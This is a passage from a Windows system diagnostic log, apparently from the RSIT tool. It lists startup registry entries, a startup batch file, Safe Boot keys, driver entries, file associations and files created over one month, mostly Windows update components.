"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2019-07-16 269192]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"CCleaner Smart Cleaning"=C:\Program Files\CCleaner\CCleaner64.exe [2018-10-23 19467544]

[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"FxSound Enhancer"=C:\Program Files (x86)\DFX\dfx.exe [2017-06-30 1665528]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2019-04-01 645456]

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
Java 32bit.bat

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ahcache.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AudioEndpointBuilder]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AudioSrv]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CoreMessagingRegistrar]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HdAudAddService.Sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HdAudBus.Sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\iai2c.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SerCx2.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\SpbCx.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\StateRepository]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\uefi.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\usbaudio.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\UserManager]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96C-E325-11CE-BFC1-08002BE10318}]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52}]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\Ahcache.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AudioEndpointBuilder]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AudioSrv]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\CoreMessagingRegistrar]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\HdAudAddService.Sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\HdAudBus.Sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\NetSetupSvc]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SerCx2.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\SpbCx.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\StateRepository]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\uefi.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\usbaudio.sys]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\UserManager]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\{4D36E96C-E325-11CE-BFC1-08002BE10318}]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\{F2E7DD72-6468-4E36-B6F1-6488F42C1B52}]

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DSCAutomationHostEnabled"=2
"EnableFullTrustStartupTasks"=2
"EnableUwpStartupTasks"=2
"SupportFullTrustStartupTasks"=1
"SupportUwpStartupTasks"=1

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"midimapper"=midimap.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msadpcm"=msadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"vidc.i420"=iyuv_32.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvu9"=tsbyuv.dll
"vidc.yvyu"=msyuv.dll
"wavemapper"=msacm32.drv
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"MSVideo8"=VfWWDM32.dll
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"wave2"=wdmaud.drv
"midi2"=wdmaud.drv
"mixer2"=wdmaud.drv

======File associations======

.js - edit - C:\Windows\System32\Notepad.exe %1
.js - open - C:\Windows\System32\WScript.exe "%1" %*

======List of files/folders created in the last 1 month======

2019-09-17 19:43:02 ----D---- C:\rsit
2019-09-17 19:43:02 ----D---- C:\Program Files\trend micro
2019-09-13 10:09:00 ----D---- C:\Users\mifoI\AppData\Roaming\java
2019-09-13 10:08:50 ----D---- C:\ProgramData\Caphyon
2019-09-13 10:08:43 ----D---- C:\Users\mifoI\AppData\Roaming\.minecraft
2019-09-13 10:08:27 ----D---- C:\Users\mifoI\AppData\Roaming\Mojang
2019-09-11 01:52:49 ----A---- C:\WINDOWS\SYSWOW64\xpsrchvw.exe
2019-09-11 01:52:49 ----A---- C:\WINDOWS\SYSWOW64\msmpeg2vdec.dll
2019-09-11 01:52:49 ----A---- C:\WINDOWS\system32\xpsrchvw.exe
2019-09-11 01:52:49 ----A---- C:\WINDOWS\system32\msmpeg2vdec.dll
2019-09-11 01:52:48 ----A---- C:\WINDOWS\SYSWOW64\mfcore.dll
2019-09-11 01:52:48 ----A---- C:\WINDOWS\system32\mfcore.dll
2019-09-11 01:52:45 ----A---- C:\WINDOWS\SYSWOW64\webplatstorageserver.dll
2019-09-11 01:52:45 ----A---- C:\WINDOWS\SYSWOW64\tsmf.dll
2019-09-11 01:52:45 ----A---- C:\WINDOWS\SYSWOW64\mstscax.dll
2019-09-11 01:52:45 ----A---- C:\WINDOWS\SYSWOW64\msjet40.dll
2019-09-11 01:52:45 ----A---- C:\WINDOWS\SYSWOW64\EdgeManager.dll
2019-09-11 01:52:45 ----A---- C:\WINDOWS\SYSWOW64\edgehtml.dll
2019-09-11 01:52:45 ----A---- C:\WINDOWS\SYSWOW64\CPFilters.dll
2019-09-11 01:52:44 ----A---- C:\WINDOWS\SYSWOW64\msxbde40.dll
2019-09-11 01:52:44 ----A---- C:\WINDOWS\SYSWOW64\msrd3x40.dll
2019-09-11 01:52:44 ----A---- C:\WINDOWS\SYSWOW64\msrd2x40.dll
2019-09-11 01:52:44 ----A---- C:\WINDOWS\SYSWOW64\mshtml.dll
2019-09-11 01:52:44 ----A---- C:\WINDOWS\SYSWOW64\jscript9.dll
2019-09-11 01:52:44 ----A---- C:\WINDOWS\SYSWOW64\Chakra.dll
2019-09-11 01:52:43 ----A---- C:\WINDOWS\system32\tsmf.dll
2019-09-11 01:52:43 ----A---- C:\WINDOWS\system32\mstscax.dll
2019-09-11 01:52:43 ----A---- C:\WINDOWS\system32\EdgeManager.dll
2019-09-11 01:52:43 ----A---- C:\WINDOWS\system32\CPFilters.dll
2019-09-11 01:52:42 ----A---- C:\WINDOWS\system32\webplatstorageserver.dll
2019-09-11 01:52:42 ----A---- C:\WINDOWS\system32\mshtml.dll
2019-09-11 01:52:42 ----A---- C:\WINDOWS\system32\edgehtml.dll
2019-09-11 01:52:41 ----A---- C:\WINDOWS\system32\StorSvc.dll
2019-09-11 01:52:41 ----A---- C:\WINDOWS\system32\jscript9diag.dll
2019-09-11 01:52:41 ----A---- C:\WINDOWS\system32\jscript9.dll
2019-09-11 01:52:41 ----A---- C:\WINDOWS\system32\Chakra.dll
2019-09-11 01:52:41 ----A---- C:\WINDOWS\system32\ClipUp.exe
2019-09-11 01:52:41 ----A---- C:\WINDOWS\system32\bcastdvruserservice.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\xpsservices.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\windows.storage.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\Windows.Storage.ApplicationData.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.Protection.PlayReady.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\vbscript.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\urlmon.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\Unistore.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\StructuredQuery.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\shell32.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\gdi32full.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\fontdrvhost.exe
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\daxexec.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\AppXDeploymentClient.dll
2019-09-11 01:52:40 ----A---- C:\WINDOWS\SYSWOW64\AppResolver.dll
2019-09-11 01:52:39 ----A---- C:\WINDOWS\SYSWOW64\Windows.UI.Xaml.dll
2019-09-11 01:52:39 ----A---- C:\WINDOWS\SYSWOW64\ntdll.dll
2019-09-11 01:52:39 ----A---- C:\WINDOWS\SYSWOW64\AudioSes.dll
2019-09-11 01:52:39 ----A---- C:\WINDOWS\SYSWOW64\AudioEng.dll
2019-09-11 01:52:39 ----A---- C:\WINDOWS\system32\WebRuntimeManager.dll
2019-09-11 01:52:38 ----A---- C:\WINDOWS\system32\winlogon.exe
2019-09-11 01:52:38 ----A---- C:\WINDOWS\system32\urlmon.dll
2019-09-11 01:52:38 ----A---- C:\WINDOWS\system32\NcaSvc.dll
2019-09-11 01:52:38 ----A---- C:\WINDOWS\system32\gdi32full.dll
2019-09-11 01:52:38 ----A---- C:\WINDOWS\system32\fontdrvhost.exe
2019-09-11 01:52:38 ----A---- C:\WINDOWS\system32\drivers\mrxsmb.sys
2019-09-11 01:52:37 ----A---- C:\WINDOWS\SYSWOW64\KernelBase.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\winresume.exe
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\winload.exe
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\win32appinventorycsp.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\pcasvc.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\ntdll.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\msctf.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\KernelBase.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\invagent.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\generaltel.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\devinv.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\CompatTelRunner.exe
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\appraiser.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\aitstatic.exe
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\aeinv.dll
2019-09-11 01:52:37 ----A---- C:\WINDOWS\system32\acmigration.dll
2019-09-11 01:52:36 ----A---- C:\WINDOWS\SYSWOW64\pidgenx.dll
2019-09-11 01:52:36 ----A---- C:\WINDOWS\system32\xpsservices.dll
2019-09-11 01:52:36 ----A---- C:\WINDOWS\system32\vbscript.dll
2019-09-11 01:52:36 ----A---- C:\WINDOWS\system32\sppsvc.exe
2019-09-11 01:52:36 ----A---- C:\WINDOWS\system32\sppobjs.dll
2019-09-11 01:52:36 ----A---- C:\WINDOWS\system32\sppcext.dll
2019-09-11 01:52:36 ----A---- C:\WINDOWS\system32\shell32.dll
2019-09-11 01:52:36 ----A---- C:\WINDOWS\system32\hal.dll
2019-09-11 01:52:36 ----A---- C:\WINDOWS\system32\AppResolver.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\win32kfull.sys
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\win32kbase.sys
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\Unistore.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\TDLMigration.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\ntoskrnl.exe
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\MPSSVC.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\FntCache.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\EdgeContent.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\DWrite.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\dssvc.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\drivers\UcmUcsiCx.sys
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\daxexec.dll
2019-09-11 01:52:35 ----A---- C:\WINDOWS\system32\AppxSysprep.dll
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\wow64.dll
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\SystemEventsBrokerServer.dll
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\drivers\ws2ifsl.sys
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\AppXDeploymentServer.dll
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\AppxAllUserStore.dll
2019-09-11 01:52:34 ----A---- C:\WINDOWS\system32\ApplyTrustOffline.exe
2019-09-11 01:52:33 ----A---- C:\WINDOWS\SYSWOW64\mf.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\SYSWOW64\combase.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\SYSWOW64\aepic.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\Windows.UI.Xaml.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\usocore.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\updatehandlers.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\updatecsp.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\TpmTasks.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\SgrmEnclave_secure.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\SgrmEnclave.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\mf.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\drivers\tm.sys
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\drivers\clfs.sys
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\audiosrv.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\AudioSes.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\AudioEng.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\AudioEndpointBuilder.dll
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\audiodg.exe
2019-09-11 01:52:33 ----A---- C:\WINDOWS\system32\aepic.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\SYSWOW64\win32kfull.sys
2019-09-11 01:52:32 ----A---- C:\WINDOWS\SYSWOW64\profext.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\SYSWOW64\msctf.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\SYSWOW64\DWrite.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\SYSWOW64\AppxAllUserStore.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\WinTypes.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\windows.storage.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\StructuredQuery.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\profext.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\hvix64.exe
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\hvax64.exe
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\DeviceCensus.exe
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\dcntel.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\combase.dll
2019-09-11 01:52:32 ----A---- C:\WINDOWS\system32\AppXDeploymentClient.dll
2019-09-11 01:52:31 ----A---- C:\WINDOWS\system32\drivers\vhdmp.sys
2019-08-28 22:11:49 ----A---- C:\WINDOWS\SYSWOW64\vcruntime140_clr0400.dll
2019-08-28 22:11:49 ----A---- C:\WINDOWS\system32\vcruntime140_clr0400.dll
2019-08-28 22:11:47 ----A---- C:\WINDOWS\SYSWOW64\msvcp140_clr0400.dll
2019-08-28 22:11:47 ----A---- C:\WINDOWS\SYSWOW64\aspnet_counters.dll
2019-08-28 22:11:47 ----A---- C:\WINDOWS\system32\msvcp140_clr0400.dll
2019-08-28 22:11:46 ----A---- C:\WINDOWS\system32\msvcr100_clr0400.dll
2019-08-28 22:11:45 ----A---- C:\WINDOWS\system32\aspnet_counters.dll
2019-08-28 22:11:43 ----A---- C:\WINDOWS\SYSWOW64\msvcr100_clr0400.dll
2019-08-28 22:11:41 ----A---- C:\WINDOWS\SYSWOW64\ucrtbase_clr0400.dll
2019-08-28 22:11:41 ----A---- C:\WINDOWS\system32\ucrtbase_clr0400.dll
2019-08-27 22:03:07 ----A---- C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2019-08-27 19:55:59 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2019-08-27 19:55:32 ----D---- C:\ProgramData\Microsoft OneDrive
2019-08-27 19:53:41 ----SHD---- C:\ProgramData\Templates
2019-08-27 19:53:41 ----SHD---- C:\ProgramData\Start Menu
2019-08-27 19:53:41 ----SHD---- C:\ProgramData\Documents
2019-08-27 19:53:41 ----SHD---- C:\ProgramData\Desktop
2019-08-27 19:50:53 ----ASH---- C:\hiberfil.sys
2019-08-27 19:50:02 ----D---- C:\ProgramData\USOShared
2019-08-27 19:50:02 ----A---- C:\WINDOWS\SYSWOW64\PrintConfig.dll
2019-08-27 19:49:54 ----SD---- C:\Users\mifoI\AppData\Roaming\Microsoft
2019-08-27 19:49:19 ----A---- C:\WINDOWS\SYSWOW64\nvStreaming.exe
2019-08-27 19:48:01 ----D---- C:\WINDOWS\Prefetch
2019-08-27 19:47:43 ----D---- C:\WINDOWS\system32\SleepStudy
2019-08-27 19:47:42 ----A---- C:\WINDOWS\system32\FNTCACHE.DAT
2019-08-27 19:28:27 ----AS---- C:\WINDOWS\bootstat.dat
2019-08-27 19:28:06 ----D---- C:\WINDOWS\system32\Microsoft
2019-08-27 19:28:06 ----D---- C:\WINDOWS\ServiceProfiles
2019-08-27 19:26:03 ----A---- C:\WINDOWS\SYSWOW64\SyncController.dll
2019-08-27 19:26:03 ----A---- C:\WINDOWS\system32\wmp.dll
2019-08-27 19:26:03 ----A---- C:\WINDOWS\system32\fcon.dll
2019-08-27 19:26:02 ----A---- C:\WINDOWS\SYSWOW64\wmpshell.dll
2019-08-27 19:26:02 ----A---- C:\WINDOWS\SYSWOW64\wmpeffects.dll
2019-08-27 19:26:02 ----A---- C:\WINDOWS\SYSWOW64\wmpdxm.dll
2019-08-27 19:26:02 ----A---- C:\WINDOWS\SYSWOW64\wmp.dll
2019-08-27 19:26:02 ----A---- C:\WINDOWS\system32\wmpshell.dll
2019-08-27 19:26:02 ----A---- C:\WINDOWS\system32\wmpeffects.dll
2019-08-27 19:26:02 ----A---- C:\WINDOWS\system32\wmpdxm.dll
2019-08-27 19:26:01 ----A---- C:\WINDOWS\system32\SyncController.dll
2019-08-27 19:26:01 ----A---- C:\WINDOWS\system32\EASPolicyManagerBrokerHost.exe
2019-08-27 19:26:01 ----A---- C:\WINDOWS\system32\ActiveSyncCsp.dll
2019-08-27 19:25:59 ----A---- C:\WINDOWS\SYSWOW64\WMADMOE.DLL
2019-08-27 19:25:59 ----A---- C:\WINDOWS\SYSWOW64\WMADMOD.DLL
2019-08-27 19:25:59 ----A---- C:\WINDOWS\SYSWOW64\msmpeg2adec.dll
2019-08-27 19:25:59 ----A---- C:\WINDOWS\SYSWOW64\MSFlacDecoder.dll
2019-08-27 19:25:59 ----A---- C:\WINDOWS\SYSWOW64\mfh264enc.dll
2019-08-27 19:25:59 ----A---- C:\WINDOWS\SYSWOW64\DolbyDecMFT.dll
2019-08-27 19:25:59 ----A---- C:\WINDOWS\system32\WMADMOE.DLL
2019-08-27 19:25:59 ----A---- C:\WINDOWS\system32\msmpeg2adec.dll
2019-08-27 19:25:59 ----A---- C:\WINDOWS\system32\MSFlacDecoder.dll
2019-08-27 19:25:59 ----A---- C:\WINDOWS\system32\mfh264enc.dll
2019-08-27 19:25:59 ----A---- C:\WINDOWS\system32\DolbyDecMFT.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\msvproc.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\mfsvr.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\mfreadwrite.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\mfplat.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\mfmpeg2srcsnk.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\mfmp4srcsnk.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\MFMediaEngine.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\SYSWOW64\mfasfsrcsnk.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\system32\WMADMOD.DLL
2019-08-27 19:25:57 ----A---- C:\WINDOWS\system32\MSAudDecMFT.dll
2019-08-27 19:25:57 ----A---- C:\WINDOWS\system32\MFMediaEngine.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\Windows.Media.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\msvproc.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\mfsvr.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\mfreadwrite.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\mfps.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\mfplat.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\mfmp4srcsnk.dll
2019-08-27 19:25:56 ----A---- C:\WINDOWS\system32\mfasfsrcsnk.dll
2019-08-27 19:25:55 ----A---- C:\WINDOWS\SYSWOW64\fveapibase.dll
2019-08-27 19:25:55 ----A---- C:\WINDOWS\SYSWOW64\fveapi.dll
2019-08-27 19:25:55 ----A---- C:\WINDOWS\system32\fvewiz.dll
2019-08-27 19:25:55 ----A---- C:\WINDOWS\system32\fveui.dll
2019-08-27 19:25:55 ----A---- C:\WINDOWS\system32\fvecpl.dll
2019-08-27 19:25:55 ----A---- C:\WINDOWS\system32\fveapibase.dll
2019-08-27 19:25:55 ----A---- C:\WINDOWS\system32\fveapi.dll
2019-08-27 19:25:55 ----A---- C:\WINDOWS\system32\drivers\fvevol.sys
2019-08-27 19:25:55 ----A---- C:\WINDOWS\system32\drivers\dumpfve.sys
2019-08-27 19:25:55 ----A---- C:\WINDOWS\system32\bdesvc.dll
2019-08-27 19:25:54 ----A---- C:\WINDOWS\SYSWOW64\WMVCORE.DLL
2019-08-27 19:25:54 ----A---- C:\WINDOWS\system32\WMVCORE.DLL
2019-08-27 19:25:54 ----A---- C:\WINDOWS\system32\WMSPDMOE.DLL
2019-08-27 19:25:50 ----A---- C:\WINDOWS\SYSWOW64\Windows.Media.MixedRealityCapture.dll
2019-08-27 19:25:50 ----A---- C:\WINDOWS\system32\MixedReality.Broker.dll
2019-08-27 19:25:50 ----A---- C:\WINDOWS\system32\Hydrogen.dll
2019-08-27 19:25:50 ----A---- C:\WINDOWS\system32\HolographicExtensions.dll
2019-08-27 19:25:49 ----RA---- C:\WINDOWS\system32\MixedRealityCapture.Pipeline.dll
2019-08-27 19:25:49 ----RA---- C:\WINDOWS\system32\MixedRealityCapture.Broker.dll
2019-08-27 19:25:49 ----A---- C:\WINDOWS\system32\Windows.Media.MixedRealityCapture.dll
2019-08-27 19:25:49 ----A---- C:\WINDOWS\system32\HoloSI.PCShell.dll
2019-08-27 19:25:49 ----A---- C:\WINDOWS\system32\HologramWorld.dll
2019-08-27 19:25:49 ----A---- C:\WINDOWS\system32\HologramCompositor.dll
2019-08-27 19:25:47 ----A---- C:\WINDOWS\system32\workfolderssvc.dll
2019-08-27 19:25:46 ----A---- C:\WINDOWS\SYSWOW64\wsp_fs.dll
2019-08-27 19:25:46 ----A---- C:\WINDOWS\SYSWOW64\wscinterop.dll
2019-08-27 19:25:46 ----A---- C:\WINDOWS\SYSWOW64\Windows.Mirage.Internal.dll
2019-08-27 19:25:46 ----A---- C:\WINDOWS\SYSWOW64\Windows.Mirage.dll
2019-08-27 19:25:46 ----A---- C:\WINDOWS\SYSWOW64\p2pnetsh.dll
2019-08-27 19:25:46 ----A---- C:\WINDOWS\SYSWOW64\P2PGraph.dll
2019-08-27 19:25:46 ----A---- C:\WINDOWS\SYSWOW64\P2P.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\wsp_health.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\regedit.exe
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\perfts.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\offreg.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\MSVidCtl.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\mstsc.exe
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\msfeeds.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\jscript.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\ieframe.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\iedkcs32.dll
2019-08-27 19:25:45 ----A---- C:\WINDOWS\SYSWOW64\AcGenral.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\werui.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\storagewmi.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\resutils.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\PlayToManager.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\nshhttp.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\mspbde40.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\msltus40.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\msisip.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\msiexec.exe
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\msi.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\msexcl40.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\mispace.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\itss.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\ieproxy.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\Chakradiag.dll
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\fsutil.exe
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\esentutl.exe
2019-08-27 19:25:43 ----A---- C:\WINDOWS\SYSWOW64\dxdiag.exe
